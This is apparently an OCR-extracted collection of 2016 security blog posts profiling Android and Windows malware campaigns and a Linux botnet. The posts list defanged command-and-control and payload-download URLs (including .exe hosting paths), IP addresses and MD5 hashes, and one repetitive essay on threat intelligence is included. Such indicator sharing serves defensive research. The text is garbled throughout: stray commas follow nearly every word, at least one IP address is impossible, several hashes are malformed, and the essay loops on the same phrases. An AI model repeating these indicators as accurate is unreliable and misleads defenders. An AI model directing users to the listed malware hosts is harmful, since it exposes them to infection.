These [1l]affiliate networks, are, known, to, provide, managed, support, including, the, 
systematic, rotation of the command and control, server, and, the, availability, of, various, 
templates, empowering, malicious attackers, with, access, to, a, variety, of, fraudulent 
techniques, allowing, them, to, easily, monetize, access, to, the, infected hosts. 


In this post, we’ll profile, profile, the, Android.Spy.277.origin, mobile, malware, found, on 
hundreds, of applications, at Google Play, expose, the, malicious, infrastructure, behind, it, 
provide, MD5s, and, discuss, in, depth, the, various tactics, techniques, and procedures, 
utilized, by, malicious, attackers, for, the purpose, of, spreading, mobile, malware, attempting, 
to, trick, users, into, executing, malicious software, on their, devices. 


Sample detection rate for a sample malware: 


MD5: a51d7f8413aa3857a4682fa631d39054 


Once executed the sample phones back to the following C &C server: 


hxxp://startappexchange.com - 184.26.136.91; 184.26.136.113 


The same malicious C &C server (startappexchange.com) is also known to have responded to 
the following IPs: 


23.15.5.200 
23.63.227.171 
95.101.2.24 
23.62.239.19 
96.6.122.67 
23.15.5.205 
23.62.236.98 
611.213.181.153 


23.63.227.208 
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23.63.227.192 


23.3.13.65 


96.6.122.74 


23.3.13.58 


23.62.236.74 


184.50.232.74 


184.84.243.57 


217.7.48.104 


217.7.48.192 


80.157.151.48 


80.157.151.67 


67.135.105.35 


23.61.194.186 


88.221.134.192 


88.221.134.211 


23.0.160.8 


95.101.0.24 


95.101.0.50 


2.21.243.57 


2.21.243.64 


23.0.160.51 


184.29.105.43 


173.223.232.66 


184.29.105.83 


96.16.98.113 
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107.14.46.80 
62.208.24.33 


217.65.36.6 


Related malicious MD5s known to have phoned back to the same C &C server: 
MD5: 53958d60a2d52c99ad305ec105d47486 

MD5: 45eaa4fc36c9a69b3ac78ddce7800daa 

MD5: b355ed6fa08ef0415d4e7c6bc602f9a8 

MD5: e4c7d87b7b20ae9555c6efe6466b32e6 


MD5: 83a449691ff40cf9d3c8c4d7119aaea7 


This post has been reproduced from [2]Dancho Danchev’s blog . 


1. http: //ddanchev. blogspot .com/2013/11/a-peek- inside-customer-ized-api-enabled.htm 


2. http: //ddanchev. blogspot .com/ 


12.1.2 Cybercriminals Launch Malicious Malvertising Campaign, Thousands of Users 
Affected (2016-04-24 21:17) 


We've recently intercepted, a currently ongoing malicious malvertising attack, affecting thou- 
sands of users globally, potentially exposing their PCs, to, a multitude of malicious software, 
compromising, the, integrity, confidentiality, and, availability, of, their, PCs. 


The campaign relies on the Angler Web malware exploitation kit, for, the, purpose of 
serving malicious software, on the, PCs, of, affected users exposing, their, PCs, to, a multitude, 
of, malicious software, potentially leading, to, a compromise, of, their, PCs. Once, users, visit, 
a legitimate Web site, part, of the, campaign, their, PCs, automatically become, part, of the 
botnet, operated, by, the, cybercriminals, behind it, with, the, campaign, relying, on, the, use, 
of, the, exploitation, of, a well known, client-side, vulnerability. 


Cybercriminals, often, rely, on, the, use, of, compromised, accounting, data, obtained, 
through, active data mining, of, a botnet’s infected population, for, the purpose, of, embed- 
ding, malicious, client-side exploits, on well Known, and highly popular, Web sites, next, to, 
the, active, client-side, exploitation, of, known, vulnerabilities, found, on public, and well, 
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known, Web sites. Yet, another highly popular attack vector, remains, the use, of compro- 
mised, advertiser network publisher’s account, for, the, purpose, of taking advantage, of, the 
publisher’s, already established, clean, network, reputation. 


In this post, we'll profile, the, malicious campaign, provide, actionable, intelligence, for, 
the, infrastructure, behind it, provide, malicious MD5s, as, well, as, discuss, in depth, the, 
tactics, techniques, and procedures, utilized, by, the, cybercriminals, behind it. 


Sample detection rate for the Trojan.Win32.Waldek.gip malware: 


MD5: f2b692d07bb35f1649b015a5ac10d6f05 


Once executed the sample phones back to: 


hxxp://datanet.cc/extra/status.html - 146.185.251.154 


Malicious URLs, used, in the, campaign: 
hxxp://gamergrad.top/track/k.track?wd=48 &fid=2 - 104.24.112.169 


hxxp://talk915.pw/track/k.track?wd=48 &fid=2 - 104.27.190.84 


Known to have responded to the same IP (146.185.251.154) are also the following ma- 
licious domains: 


hxxp://crenwat.cc 
hxxp://oldbog.cc 
hxxp://datanet.cc 
hxxp://glomwork.cc 
hxxp://speedport.cc 
hxxp://myhostclub.cc 
hxxp://terminreg.cc 


hxxp://currentnow.cc 
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hxxp://copyinv.cc 
hxxp://lableok.cc 
hxxp://agentad.cc 
hxxp://appclone.cc 
hxxp://tune4.cc 


hxxp://objects.cc 


Once executed, the, sample, phones, back, to the, following, C &C server: 


hxxp://188.138.70.19 


Known to have responded to the same IP (188.138.70.19) are also the following mali- 
cious domains: 


hxxp://alfatrade.cxaff.com 


hxxp://affiliates.alfatrade.com 


Known to have phoned back to the same malicious C &C server, are, also, the follow- 
ing malicious MD5s: 


MD5: aaa6559738f74bd7a2ff1b025a287043 
MD5: b919a06e79318c0d50b8961b0e32eb0a 
MD5: a384337cad9335b34d877dd4c59c73ce 
MD5: e7b7b7664e89be18bcf2b79cc116731f 


MD5: d712ddbc9b4fb27d950be93c1e144cce 


Related malicious MD5s known to have phoned back to the same C &C server: 
MD5: aaa6559738f74bd7a2ff1b025a287043 


MD5: b919a06e79318c0d50b8961b0e32eb0a 
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MD5: a2bd512e438801a2aa1871a2ac28e5bd 
MD5: f01f9ded34cfe21098a2275563cf0d9d 


MD5: e7b7b7664e89bel18bcf2b79cc116731f 


This post has been reproduced from [1]Dancho Danchev’s blog . 


1. http://ddanchev. blogspot .com/ 


12.1.3 Analyzing the Bill Gates Botnet - An Analysis (2016-04-24 22:47) 


We've, recently, intercepted, a high-profile, Linux-based, botnet-driven, type of, malicious, 
software, that’s capable, of launching, a multitude of malicious attacks, on, compromised 
servers, potentially, exposing, the, integrity, confidentiality, and, availability, of, the com- 
promised servers. Malicious attackers, often rely, on the use of compromised servers, for, 
the purpose, of, utilizing the access for malicious purposes, including, the capability, to 
launch malicious DDoS (Denial of Service Attack) attacks, and the ability, to spread additional 
malicious software, to potential users, including the capability to monetize access to the 
service, by, launching, DDoS for hire type of malicious and fraudulent services, including, the 
Capability to launch high performance DDoS attacks. 


In this post, we'll, profile, and analyze, the Bill Gates botnet, provide, actionable intelli- 
gence, on, the infrastructure, behind it, and, discuss, in depth, the tactics, techniques, and 
procedures, of the cybercriminals, behind it. 


Malicious MD5s known to be part of the Bill Gates botnet: 
MD5: 5d10bcb15bedb4b94092c4c2e4d245b6 

MD5: 0d79802eeae43459ef0f6f809eF7 4ecc 

MD5: 9a77flad125cf34858be5e438b3f0247 

MD5: 9a77flad125cf34858be5e438b3f0247 

MD5: a89c089b8d020034392536d66851b939 


MD5: a5b9270a317c9ef0beda992183717b33 


Known Bill Gates botnet C &C server: 
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hxxp://dgnfd564sdf.com - 122.224.34.42; 122.224.50.37 


Malicious C &C servers known to be part of the Bill Gates botnet: 
202.103.178.76 

121.12.110.96 

112.90.252.76 

112.90.22.197 


112.90.252.79 


Known to have responded to the same malicious IP (122.224.50.37) are also the follow- 
ing malicious domains: 


hxxp://Ifs99.com 
hxxp://chchong.com 
hxxp://uc43.net 
hxxp://59wgw.com 
hxxp://frade8c.com 
hxxp://96hb.com 
hxxp://cq670.com 


hxxp://776ka.com 


Malicious MD5s known to have phoned back to the same C &C server IP (122.224.50.37): 
MD5: 6739ca4a835c7976089e2f00150f252b 
MD5: eb234cee4ff769f2b38129bc164809d2 
MD5: dc893d16316489dffa4e8d86040189b2 


MD5: Oclcac2a019aalcc2dcc0d3b17fc4477 
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MD5: b7765076af036583fc81a50bd0b2a663 


Known to have responded to the same malicious IP (122.224.34.42) are also the follow- 
ing malicious domains: 


hxxp://76.wawall.com 
hxxp://903.wawall.com 
hxxp://904.wawall.com 
hxxp://905.wawall.com 
hxxp://906.wawall.com 
hxxp://907.wawall.com 
hxxp://91ww.0574yu.com 
hxxp://9911sf.com 
hxxp://901.t772277.com 
hxxp://aisf.jux114.com 
hxxp://520.wawall.com 
hxxp://awooolsf.com 
hxxp://2288game.com 
hxxp://588bc.com 
hxxp://488game.com 


hxxp://588bc.com 


Malicious MD5s known to have been downloaded from the same malicious C &C server 
IP (122.224.34.42): 


MD5: 5d10bcb15bedb4b94092c4c2e4d245b6 


MD5: 9a77flad125cf34858be5e438b3f0247 
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Malicious MD5s known to have been phoned back to the same malicious C &C server 
IP(122.224.34.42): 


MD5: 815e453b6e268addf6a6763bfe013928 


Once executed the sample phones back to the following malicious C &C server IPs: 
hxxp://awooolsf.com/222.txt - 122.224.34.42 


hxxp://xxx.com/download/xx.exe - 67.23.112.226 


Known to have responded to the same malicious IP (67.23.112.226) are also the follow- 
ing malicious domains: 


hxxp://falconglobalimpex.com 
hxxp://deschatz-army.net 
hxxp://m.xxx.com 
hxxp://xxx.com 
hxxp://xxxsites.com 
hxxp://t.xxx.com 
hxxp://m.xxx.org 
hxxp://m.xxxsites.com 


hxxp://Xxx.org 


Known to have been downloaded from the same malicious IP (67.23.112.226) are also 
the following malicious MD5s: 


MD5: b4b483eb0d25fa3a9ec589eb11467ab8 


Known to have phoned back to the same malicious C &C server (67.23.112.226) are 
also the following malicious MD5s: 


MD5: 53a7fc24cb19463f8df3f4fe3ffd79b9 
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MD5: 268b8bcacec173eace3079db709b9c69 
MD5: Ofaf6988dfeaa98241c19fd834ecal94 
MD5: 87f8ffeb17a72fda7cf28745fa7a6be8 


MD5: c973f818a5f9326c412ac9c4dfaeb0Obd 


This post has been reproduced from [1]Dancho Danchev’s blog . 


1. http://ddanchev. blogspot .com/ 


12.1.4 Malware Campaign Using Google Docs Intercepted, Thousands of Users Af- 
fected (2016-04-26 20:13) 


We've recently intercepted, a malicious campaign, utilizing, Google Docs, for, the purpose, 


of spreading, malicious software, potentially, exposing, the confidentiality, integrity, and 
availability, of the, targeted hosts. 


In this, post, we’ll profile, the malicious campaign, expose, the malicious, infrastructure, 
behind, it, provide, MD5s, and, discuss, in depth, the, tactics, techniques, and procedures, of, 
the, cybercriminals, behind it. 


Sample malicious URL: 


hxxp://younglean.cba.pl/lean/ - 95.211.80.4 


Sample malicious URL hosting locations: 
hxxp://ecku.cba.pl/js/bin.exe 
hxxp://mondeodoslubu.cba.pl/js/bin.exe 
hxxp://piotrkochanski.cba.pl/js/bin.exe 


hxxp://szczuczynsp.cba.pl/122/091.exe 


Known to have responded to the same malicious (95.211.80.4) are also the following 
malicious domains: 
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hxxp://barbedosgroup.cba.pl 
hxxp://brutalforce.pl 
hxxp://christophar-hacker.p! 
hxxp://moto-przestrzen.pl 
hxxp://eturva.y0.pl 
hxxp://lingirlie.com 
hxxp://ogladajmecz.com.pl 
hxxp://oriflamekonkurs2116.c0.p! 
hxxp://umeblowani.cba.pl 
hxxp://webadminvalidation.cba.pl 
hxxp://adamr.pl 
hxxp://alea.cba.pl 
hxxp://artbymachonis.cba.pl 
hxxp://beqwqgdu.cba.pl 
hxxp://bleachonline.pl 
hxxp://facebook-profile-natalia9320.j.pl 
hxxp://fllrev1978.cba.pl 
hxxp://gotowesms.pl 
hxxp://kbvdfuh.cba.pl 
hxxp://maplka1977.c0.pl 
hxxp://nagrobkiartek. pl 
hxxp://nyzusbojpxnl.cba.pl 
hxxp://okilh1973.cba.pl 
hxxp://pucusej.cba.pl 


hxxp://sajtom.pl 
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hxxp://tarnowiec.net. pl 
hxxp://techtell. pl 


hxxp://testujemypl.cba.pl 


hxxp://lawendowawyspa.cba.pl 


hxxp://younglean.cba.pl 


hxxp://delegaturaszczecin.cba.pl 


hxxp://metzmoerex.cba.pl 
hxxp://kmpk.cO.pl 
hxxp://500plus.cO.pl 
hxxp://erxhxrrb1981.cba.pl 
hxxp://exztwsl.cba.pl 
hxxp://fafrvfa.cba.pl 
hxxp://fastandfurios.cba.pl 
hxxp://filmonline.cba.pl 
hxxp://fragcraft. pl 
hxxp://fryzjer.cba.pl 
hxxp://hgedkom1973.cba.pl 
hxxp://luyfiv1972.cba.pl 
hxxp://oliviasekulska.com 
hxxp://opziwr-zamosc.pl 
hxxp://ostro.ga 
hxxp://rodzina500plus.cO.pl 
hxxp://roknasilowni.tk 


hxxp://vfqqgr1971.cba.pl 
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Sample malicious MD5s known to have phoned back to the same malicious IP (95.211.80.4): 
MD5: 495f05d7ebca1022da2cdd1700aeac39 
MD5: 68abd8a3a8c18c59f638e50ab0c386a4 
MD5: 65b4bdba2d3b3e92b8b96d7d9ba7f88e 
MD5: 64b5c6b20e2d758a008812df99a5958e 


MD5: a0869b751e4a0bf27685f2f867 7f9c62 


Once executed the sample phones back to the following C &C servers: 
hxxp://smartoptionsinc.com - 216.70.228.110 

hxxp://ppc.cba.pl - 95.211.80.4 

hxxp://apps.identrust.com - 192.35.177.64 

hxxp://cargol.cat - 217.149.7.213 


hxxp://bikeceuta.com - 91.142.215.77 


This post has been reproduced from [1]Dancho Danchev’s blog . 


1. http: //ddanchev. blogspot .com/ 


12.1.5 Malicious Client-Side Exploits Serving Campaign Intercepted, Thousands of 
Users Affected (2016-04-26 20:39) 


We've recently intercepted, a currently, circulating, malicious campaign, utilizing, a variety, 
of compromised, Web sites, for, the purpose, of serving, malicious software, to socially 
engineered, users. 


In this post, we'll profile, the campaign, the infrastructure, behind, it, provide, action- 
able, intelligence, MD5s, and, discuss, in depth, the tactics, techniques, and procedures, of, 
the cybercrimnals, behind it. 


Sample malicious URL: 


hxxp://directbalancejs.com/module.so - 37.48.116.208; 31.31.204.161 
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hxxp://2-eco.ru 
hxxp://2401.ru 
hxxp://24xxx.site 
hxxp://3502050.ru 
hxxp://6553009.xyz 
hxxp://7032949.ru 
hxxp://academing.ru 
hxxp://academyfinance.ru 
hxxp://activelifelab.com 
hxxp://advokat-mikheev.ru 
hxxp://advokatstav.ru 
hxxp://akvahim98.ru 
hxxp://al-minbar.ru 
hxxp://allesmarket.com 
hxxp://alltrump.ru 
hxxp://altropasso.ru 
hxxp://ambertao.info 
hxxp://ambertao.org 
hxxp://ancra.ru 
hxxp://andr-6-update.ru 
hxxp://android-new.ru 
hxxp://androidid-6-new.ru 
hxxp://angrymultik.ru 


hxxp://animaciyafoto.ru 
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hxxp://animaciyaonline.ru 
hxxp://animaciyastiker.ru 
hxxp://animationline.ru 
hxxp://animehvost.ru 
hxxp://anyen.ru 
hxxp://anywifi.online 
hxxp://apple-pro.moscow 
hxxp://appliancerepairmonster.com 
hxxp://aptechka.farm 
hxxp://arbosfera.ru 
hxxp://archsalut.ru 
hxxp://arstd.ru 
hxxp://aslanumarov.ru 
hxxp://atlanted.ru 
hxxp://aurispc.ru 
hxxp://avangardmaster.ru 
hxxp://aviacorp24.ru 


hxxp://awpashko.com 


Known to have phoned back to the same malicious C &C server (31.31.204.161) are 
also the following malicious MDSs: 


MD5: c3754018dab05b3b8aac5fe8100076ce 


Once executed the sample phones back to the following C &C server: 


hxxp://info-get.ru - 31.31.204.161 
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Known to have phoned back to the same malicious C &C server (31.31.204.161) are 
also the following malicious MD5s: 


MD5: 4ff9bd7a045b0fe42a8f633428a59732 

MD5: 46b1eaae5b53668a7ac958aecf4e57c3 
MD5: d643025c5d0a2a2940502f4b15cal801 
MD5: 75dce2d84540153107024576bfce08fc 


MD5: a23235ed940a75f997c127f59b09011d 


This post has been reproduced from [1]Dancho Danchev’s blog . 


1. http://ddanchev. blogspot .com/ 


12.2 May 


12.2.1 Threat Intelligence - An Adaptive Approach to Information Security 
(2016-05-07 13:49) 


This article will detail the basics of threat intelligence gathering discuss various threat intel- 
ligence gathering methodologies discuss the basics of threat intelligence gathering as well 
as discuss various proactive threat intelligence gathering methodologies in the context of 
proactive security defense 


01. Overview of Threat Intelligence 


Threat intelligence is a multi-disciplinary approach to collecting processing and dissemi- 
nating actionable threat intelligence for the purpose of ensuring that an organizations security 
defense is actively aware of threats facing its infrastructure so that an adequate and cost- 
effective strategy can be formulated to ensure the confidentiality integrity and availability of 
the information. Threat Intelligence is the process of collecting processing and disseminating 
actionable intelligence for the purpose of ensuring that an organizations infrastructure remains 
properly secured from threats facing its infrastructure. The collection phrase can be best 
described as the process of obtaining processing and analyzing actionable threat intelligence 
for the purpose of processing and disseminating the processed data. The collection phrase 
consists of actively obtaining real-time threat intelligence data for the purpose of processing 
enriching and assessing the data for the purpose of processing and disseminating the data. 


5051 


The collection phrase consists of active monitoring of sources of interest including vari- 
ous public and privately closed community sources for the purpose of establishing an active 
threat intelligence gathering program foundation. The collection phrase consists of assessing 
and selecting a diverse set of primary and secondary public and privately closed sources 
for the purpose of establishing a threat intelligence gathering model. The collection phrase 
consists of assessing and selecting primary and secondary public and privately closed sources 
for the purpose of establishing an active threat intelligence collection model. The collection 
phrase consists of assessing the primary secondary public and privately closed sources for the 
purpose of establishing an active threat intelligence gathering collection model. The collection 
phase consists of assessing and selecting the primary and secondary public and privately 
closed sources for the purpose of establishing the foundations of the collection phrase. 


The processing phrase consists of actively selecting processing tools and methodologies 
for the purpose of setting the foundations for a successful processing of the data. The pro- 
cessing phase consists of actively processing the threat intelligence gathering collected data 
for the purpose of establishing the foundations for a successful processing of the data. The 
processing phase consists of collecting the processed data for the purpose of establishing the 
foundations for a successful processing of the collected data for the purpose of processing and 
enriching the processed data. The processing phase consists of active collection enrichment 
and processing of the collected data for the purpose of active processing of the collected 
data. The processing phase consists of active selection of primary and secondary public and 
privately closed sources for the purpose of processing the collected data for the purpose 
of enriching and processing the collected data. The processing phase consists of active 
real-time aggregation of actionable threat intelligence data for the purpose of establishing 
the foundations of active processing and enrichment of the processed data for the purpose of 
processing and enriching of the processed data. 


The dissemination phase consists of active processing and dissemination of the processed data 
for the purpose of communicating the actionable intelligence for the purpose of ensuring that 
an organizations defense is actively aware of the threats facing its infrastructure and security 
defense mechanisms. The dissemination phase consists of active distribution of the processed 
and enriched actionable intelligence for the purpose of active dissemination of the processed 
and enriched data. The dissemination phase consists of active dissemination and enrichment 
of the processed data for the purpose of establishing the foundations of an active threat 
intelligence gathering process. The dissemination phase consists of active communication 
and distribution of the processed and enriched data for the purpose of communicating the 
processed and enriched data across the organizations security defense mechanisms. 


02. Threat Intelligence Methodologies 
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Numerous threat intelligence methodologies are currently available for an organization 
to take advantage of on its way to properly secure its infrastructure taking into consideration 
a proactive security response. Among the most common data acquisition strategies remains 
the active data acquisition through forum and communities monitoring including the active 
monitoring of private forums and communities. Carefully selecting and primary and secondary 
sources of information is crucial for maintaining the necessary situational awareness to stay 
ahead of threat facing the organizations infrastructure including the establishment of an active 
response response through an active threat intelligence gathering program. Among the most 
common threat intelligence acquisition methodologies remains the active data acquisition 
through primary and secondary forums and communities including the data acquisition 
through private and secondary community based type of acquisition platforms. 


Among the most common threat intelligence data acquisition strategies remains the ac- 
tive team collaboration in terms of data acquisition data processing and data dissemination 
for the purpose of establishing an active organizations security response proactively respond- 
ing to the threats facing an organizations infrastructure. Among the most common data 
acquisition strategies in terms of threat intelligence gathering methodologies remains the 
active enrichment of the sources of information to include a variety of primary and secondary 
sources including private and community based primary and secondary sources. 


03. Proactive Threat Intelligence Methodologies 


Anticipating the emerging threat landscape greatly ensures an organizations successful 
implementation of a proactive security type of defense ensuring that an organizations secu- 
rity defense remains properly protected from the threats facing its infrastructure. Properly 
understanding the threat landscape greatly ensures that a proactive response can be properly 
implemented for the purpose of ensuring that an organizations security defense remains 
properly protected from the threats facing its infrastructure. Taking into consideration the 
data obtained through an active threat intelligence gathering program greatly ensures that a 
proactive security response can be adequately implemented to ensure that an organizations 
security defense remains properly protected from the threats facing its infrastructure. 


Among the most common threat acquisition tactics remains the active understanding of 
the threats facing an organizations security infrastructure to ensure that an adequate 
response can be properly implemented ensuring that an organizations defense remains 
properly protected from the threats facing its infrastructure. Among the most common 
threat intelligence gathering methodologies remains the active team collaboration to ensure 
that an active enrichment process can be properly implemented further ensuring that an 
organizations defense can be properly protected from the threats facing its infrastructure. 
Based on the information acquired through an active threat intelligence gathering acquisition 
processing and dissemination program further ensuring that an organizations infrastructure 
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can be properly protected from the threats facing its infrastructure. 


04. The Future of Threat Intelligence 


The future of threat intelligence gathering largely relies on a successful set of threat in- 
telligence gathering methodologies active data acquisition processing and dissemination 
strategies including the active enrichment of the processed data for the purpose of ensur- 
ing that an organizations security defense remains properly in place. The future of threat 
intelligence largely relies on the successful understanding of multiple threat vectors for 
the purpose of establishing an organizations security defense. Relying on a multi-tude of 
enrichment processes including the active establishment of an an active threat intelligence 
gathering acquisition processing and dissemination program greatly ensures that a proactive 
team-oriented approach can be implemented to ensure that an organizations security defense 
remains properly protected from the threats facing its infrastructure. 


05. Conclusion 


Threat Intelligence acquisition processing and dissemination remains a largely proactive 
response to a growing set of emerging threats facing an organizations infrastructure where 
the active establishment of an active threat intelligence gathering acquisition processing 
and dissemination remains an active response to a growing set of security threats facing 
an organization’s infrastructure. Properly ensuring that an organization’s security defense 
remains properly secured from the threats facing its infrastructure ensures that an organiza- 
tions security defense remains properly in place further ensuring that a successful information 
security strategy can be properly implemented and that an organization’s security defense 
can be properly put in place. 


If you would like to receive additional information regarding a possible threat intelligence 
program evaluation facing your company’s infrastructure including additional information 
regarding the threat landscape discussing the threats facing your organizations infrastructure 
you Can approach me at dancho.danchev@hush.com 


12.2.2 Mobile Malware Hits Google Play, Thousands of Users Affected 
(2016-05-15 17:28) 


We've recently, intercepted, a currently, ongoing, malicious, campaign, that’s utilizing, Google 
Play, for, the purpose, of, serving, malicious, software, to, unsuspecting, users. 
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In this, post, we’ll, profile, the campaign, provide malicious MD5s, expose, the, malicious, 
infrastructure, behind, it, and, discuss, in, depth, the, tactics, techniques, and procedures, of, 
the, cybercriminals, behind, it. 


Malicious MD5s known to be part, of the, malicious, campaign: 
MD5: 4cbc7513072alcOb03f7cedc6d058af4 
MD5: 4defc5803de76f506bfc3a6c2c90bd87 


MD5: 13647981b37f0c038e096c58b8962f95 


Once, executed, the, sample, phones, back, to, the, following, C &C servers: 
hxxp://petrporosya.com/123/ - 185.106.92.110 


hxxp://78.46.123.205/111/inj/paypal/paypal.php 


Known to have responded to the same malicious C &C server IP (185.106.92.110) is 
also the following malicious C &C server: 


hxxp://traktorporosya.com 


Related malicious MD5s known to have phoned back to the same malicious C &C server 
(185.106.92.110): 


MD5: a765d6c0c046ffb88f825b3189f02148 
MD5: 48cd9d9e03f92743b673a0c8ce58704a 
MD5: 58f02914791f1e3075d574e288c80a26 
MD5: O09f3f1bd2e91fb5af0c71db307777bbb 
MD5: 568ef0fb4d645350b65edb031f4ade2f 


MD5: d06ec8b87 7e2f0f73c4533c4c105acb8 


Related malicious MD5s known to have phoned back to the same malicious C &C server 
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(78.46.123.205): 
MD5: 32c8af7e7e9076b35dde4d677b14e594 


MD5: 27e4b9ae53c2300723c267cf67b930bf 


We'll continue monitoring the campaign, and, post, updates, as, soon, as, new, develop- 
ments, take, place. 


12.2.3. Malicious Campaign Affects Hundreds of Web Sites, Thousands of Users Af- 
fected (2016-05-16 10:33) 


We've recently intercepted, a currently, circulating, malicious, campaign, affecting, hundreds, 
of Web sites, and exposing, users, to, a, multi-tude, of, malicious, software. 


In this post, we’ll profile, the campaign, provide malicious MD5s, expose, the, infrastruc- 
ture, behind, it, and, discuss, in-depth, the, tactics, techniques, and, procedures, of, the, 
cybercriminals, behind it. 


Malicious URLs used in the campaign: 
hxxp://default7.com - 199.48.227.25 
hxxp://test246.com - 54.208.99.166 
hxxp://test0.com - 72.52.4.119 
hxxp://distinctfestive.com - 54.208.99.166 


hxxp://ableoccassion.com - 54.208.99.166 


Sample malware used in the campaign: 


MD5: 9854f14ca653ee7c6bf6506d823f7371 


Once executed, a, sample, malware, phones, back, to, the, following, C &C server: 


hxxp://intva31.homelandcustom.info (52.6.18.250) 
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Known to have phoned back to the same malicious C &C server IP (54.208.99.166), are, 
also, the, following, malicious, MD5s: 


MD5: fd368af200fd835687997ca2a4a0389b 
MD5: c0379cda1717d1e05c938f8e06c04a46 
MD5: 60eef5b116579d75b272a61e40716bc0 
MD5: 8481f23748358fbfd5c36cea53c90793 


MD5: 0953f8ec3f0001b3e5f3490203135def 


Once executed, a, sample, malware, phones, back, to, the, following, C &C servers: 
hxxp://ii55.net (69.172.201.153) 


hxxp://rwai.net (54.208.99.166) 


Known to have phoned back to the same malicious C &C server IP (69.172.201.153) 
are also the following malicious MD5s: 


MD5: 5979f69be8b6716c0832b6831c398914 
MD5: a27083ff19b187cbc64644bc10d2af11 

MD5: b9306bb08ac502c7bcaf3d7e0cd9d846 
MD5: cd34980dda700d07b93eef7910a2a8be 


MD5: b708860e7962b10e26568c9b037765df 


Known to have phoned back to the same malicious C &C server IP (54.208.99.166) are 
also the following malicious MD5s: 


MD5: 9854f14ca653ee7c6bf6506d823f7371 
MD5: 90a88230d5b657ced3b2d71162a33cff 
MD5: 70465233d93aa88868d7091454592a80 


MD5: f8e21525c6848f45e4ab7 7aee05f0a28 
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Related malicious MD5s known to have phoned back to the same malicious C &C server 
(54.208.99.166): 


MD5: fd368af200fd835687997ca2a4a0389b 
MD5: c0379cda1717d1e05c938f8e06c04a46 
MD5: 60eef5b116579d75b272a61e40716bc0 
MD5: 8481f23748358fbfd5c36cea53c90793 


MD5: 0953f8ec3f0001b3e5f3490203135def 


We'll continue, monitoring, the, campaign, and, post, updates, as, soon, as, new, devel- 
opments, take, place. 

12.2.4 Mobile Malware Hits Google Play, Hundreds of Users Affected (2016-05-16 13:06) 
We've recently, intercepted, yet, another, mobile, malware, variant, affecting, Google Play, 


with, the, cybercriminals, behind, it, exposing, its, users, to, a, multi-tude, of, malicious, 
software. 


In this post, we’ll profile, the campaign, provide malicious MD5s, expose, the, infrastruc- 
ture, behind it, and, discuss, in-depth, the, tactics, techniques, and procedures, of, the, 
cybercriminals, behind it. 


Malicious MD5s used in the campaign: 


MD5: 7f55e0b91f5151328e779a3a425fc241 


MD5: 91139d1dfa5df1f18c7f40192b2c49ce 


Once executed, a, sample, phones, back, to, the, following, C &C, server: 


hxxp://mob-stats.com - 5.149.252.2 
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Known C &C server, used, in, the, campaign: 


hxxp://update-sys-android.com/upd.php - 192.99.99.186 


Once executed, a, sample, malware, phones, back, to, the, following, C &C, servers: 
hxxp://counter.wapstart.ru - 185.127.149.76; 81.19.95.17 


hxxp://goalez.com - 91.219.195.3; 91.219.194.43; 91.219.194.8 


Known to have phoned back to the same C &C server (185.127.149.76; 81.19.95.17), 
are, also, the, following, malicious, MD5s: 


MD5: c8afecd653d4b0b7ea48de13d6001a31 


MD5: bfdb43b0f44a986c2cb495c38746cd23 


Once executed, a, sample, malware, phones, back, to, the, following C &C servers: 
hxxp://kingwar.mgates.ru - 148.251.154.17 


hxxp://counter.wapstart.ru - 185.127.149.76 


Known, to, have, phoned, back, to, the, same, malicious, C &C, server (91.219.195.3), 
are, also, the following, malicious, MD5s: 


MD5: 3ad15daf656a06bf850ea6973192ae47 
MD5: 117b8362a54ece041307a136aceeb92c 
MD5: 4dbdfaf3e8f5a09a7a4b82024f1c1072 

MD5: 1521e73bb153f31015ab037f979602bc 


MD5: 25318484bab66e0e8762c9fc5alf888d 


Once executed, a, sample, malware, phones, back, to, the, following, C &C servers: 


hxxp://forces.may-trade.ru - 185.82.216.58 
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hxxp://plusfiles.890m.com - 91.219.195.3 


Known to have been downloaded from the same malicious C &C server IP (91.219.194.8) are 
also the following malicious MD5s: 


MD5: 31ad2a5a5d02e6c5e55817386b8eec01 
MD5: 0815607c938c4f2088569be34ff57141 

MD5: f629111b34e8e4d97ee26d2c6b19db96 
MD5: 29d87de6b476fc1a873962ae04bbe206 


MD5: a27158c55555ff2953e0a54a9996713d 


Known to have phoned back to the same malicious C &C server IP (91.219.194.43), are, 
also, the, following, malicious, MD5s: 


MD5: 76dd60b9f406be3b808db6fca2d856ff 


MD5: ad33371a2495a0f9236c988f7024edb1 


Once executed, a, sample, malware, phones, back, to, the, following, C &C server IPs: 
hxxp://mu.sanek.com - 208.73.211.168 

hxxp://muforum.info - 91.219.194.43 

hxxp://best-hoster-group.ru - 91.219.193.252 

hxxp://best-hoster.ru - 91.219.193.252 

hxxp://freeller.net - 91.219.193.254 

hxxp://hostagent.ru - 77.222.40.254 


hxxp://ksdnewr.com - 192.64.147.242 


We'll continue, monitoring, the, campaign, and post, updates, as soon, as new, develop- 
ments, take, place. 
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12.2.5 Mobile Malware Intercepted, Thousands of Users Affected (2016-05-16 14:23) 


We've recently intercepted a new mobile malware, variant, targeting, users, internationally, 
and exposing, their, devices, to, a, multi-tude, of malicious, software. 


In this post, we'll profile, the campaign, provide malicious MD5s, expose, the infrastruc- 
ture, behind, it, and discuss, in, depth, the, tactics, techniques, and procedures, of, the, 
cybercriminals, behind it. 


Sample malicious MD5s used in the campaign: 
MD5: 4f1696ccO06bdab9508ba3434edab2f49 


MD5: 15ef763ba561eb91b5790906505f0f79 


MD5: 890dfd6b50b7ca870ceb04762725b8a6 
MD5: 4a3b68aeb96ef0f26f855f6afb688a3c 
MD5: c729ce2babce74998726257f167da62e 


MD5: 3db50821ff074a70dcbc5c31c0a78el14 


Once executed, a sample, malware, phones back to the following C &C server: 


hxxp://alfabrong.eu/data/id=39759ac6-0898-424b-9e0d-790edfaa700e - 5.101.117.79; 
5.187.4.15 


Known to have responded to the same malicious C &C server (5.101.117.79) are also 
the following malicious domains: 


hxxp://bugstracking.xyz 
hxxp://bugstrucking.xyz 
hxxp://ssd850pro.pw 
hxxp://forclonabster.eu 


hxxp://bugtracking.biz 
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hxxp://directplaytds.com 
hxxp://forclonabster. xyz 
hxxp://alfabrong.eu 


hxxp://innotion. pw 


Known to have responded to the same malicious C &C server (5.187.4.15) are also the 
following malicious C &C servers: 


hxxp://alfabrong.eu 
hxxp://hyperlabs. biz 
hxxp://nkprus.ru 


hxxp://programmiandroid.org 


We’ll continue monitoring the campaign, and, will, post, updates, as, soon, as, new, de- 
velopments, take, place. 


12.2.6 Mobile Malware Hits Google Play, Hundreds of Users Affected (2016-05-16 17:52) 


We've, recently, intercepted, yet, another, malicious, campaign, utilizing, Google Play, for, 
